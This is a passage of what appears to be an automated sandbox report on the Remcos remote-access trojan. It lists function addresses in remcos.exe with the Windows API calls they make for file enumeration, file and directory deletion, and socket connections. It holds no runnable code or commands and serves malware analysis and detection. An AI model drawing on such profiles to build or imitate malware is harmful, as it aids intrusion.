asic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_t
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 27_2_0040728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 27_2_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QA
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 27_2_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 27_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 34_2_00404C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 34_2_0040751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 34_2_00410586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_t
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 34_2_0040728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 34_2_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QA
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 34_2_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,
